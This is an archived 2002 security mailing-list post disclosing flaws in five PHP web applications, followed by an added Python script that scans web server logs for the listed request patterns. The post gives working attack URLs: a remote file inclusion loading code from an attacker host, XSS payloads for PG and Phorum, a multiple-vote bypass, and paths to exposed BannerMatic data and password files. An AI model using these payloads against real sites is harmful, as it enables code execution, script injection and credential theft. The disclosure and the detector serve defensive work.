Vulnerability Development mailing list archives
Security holes : Pseudo-Frame, PG, KvPoll, Phorum, BanMat
From: frog frog <leseulfrog () hotmail com>
Date: 12 May 2002 11:44:26 -0000
Product 1 :
***********
Pseudo Frame 1.0
http://www.clicky-web.net

Problem :
- File inclusion

Exploit :
- http://www.site.com/index.php?page=http://www.haxor.com/file
  with file.php on http://www.haxor.com .

Product 2 :
***********
PG 1.0
http://www.clicky-web.net

Problems :
- XSS
- Path Disclosure

Exploits :
- index.php?picture_n="%20width=0><script>SCRIPT</script><img%20width=0%20src="&gallery_name=path
- index.php?picture_n=image.gif&gallery_name=non-existant-path

Product 3 :
***********
KvPoll 1.1
http://www.killervault.com

Problem :
- Skirting of safety against multiple votes

Exploit :
- /clear_cookies.php

Product 4 :
***********
Phorum 3.3.2a RC1
http://phorum.org

Problem :
- XSS

Exploits :
- /read.php?f=1&i=1&t=1"><form%20name=o><input%20name=u%20value=XSS></form><script>alert(document.o.u.value)</script>
- "><script>SCRIPT</script> in a message in the "email" input

Product 5 :
***********
BANNERMATIC V1, V2, V3
http://www.getcruising.com

Problem :
- Information recovery

Exploits :
- /ban.log
- /ban.bak
- /ban.dat
- /banmat.pwd

frog-m@n
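A log check for the request patterns listed in the post above, as an added example that is not part of the original message or of any of the named products. The function names, finding labels and sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Files the post lists as retrievable from a BannerMatic install.
BANMAT_FILES = {"ban.log", "ban.bak", "ban.dat", "banmat.pwd"}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.I)           # URL used as a parameter value
MARKUP = re.compile(r"<\s*(?:script|form|input|img)\b", re.I)  # HTML tag inside a value
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return sorted finding labels for one request target (path plus query)."""
    parts = urlsplit(target)
    name = parts.path.rsplit("/", 1)[-1].lower()
    findings = set()
    if name in BANMAT_FILES:
        findings.add("banmat-data-file")
    if name == "clear_cookies.php":
        findings.add("kvpoll-cookie-reset")
    # parse_qsl percent-decodes each value, so %3Cscript%3E is seen as <script>.
    for _key, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_URL.match(value.strip()):
            findings.add("remote-url-param")
        if MARKUP.search(value):
            findings.add("markup-in-param")
    return sorted(findings)

def scan(lines):
    """Return (target, findings) for every log line with at least one finding."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((match.group(1), findings))
    return hits

# Constructed sample log lines; addresses, hosts and paths are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/May/2002:12:00:01 +0000] "GET /index.php?page=http://remote.example/file HTTP/1.0" 200 512',
    '192.0.2.11 - - [12/May/2002:12:00:05 +0000] "GET /read.php?f=1&i=1&t=1%22%3E%3Cscript%3ESCRIPT%3C/script%3E HTTP/1.0" 200 900',
    '192.0.2.12 - - [12/May/2002:12:00:09 +0000] "GET /banners/banmat.pwd HTTP/1.0" 200 64',
    '192.0.2.13 - - [12/May/2002:12:00:12 +0000] "GET /index.php?picture_n=image.gif&gallery_name=holiday HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(findings, target)
```

The PG path-disclosure request and the Phorum "email" input case do not stand out in a request line, so this check does not cover them.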